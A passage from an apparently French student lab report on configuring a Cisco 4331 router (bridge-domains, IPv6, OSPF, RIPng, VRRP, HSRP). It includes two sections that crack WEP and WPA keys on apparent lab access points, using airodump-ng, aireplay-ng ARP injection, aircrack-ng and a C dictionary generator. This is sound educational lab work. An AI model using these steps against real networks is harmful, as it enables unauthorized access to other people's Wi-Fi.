&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
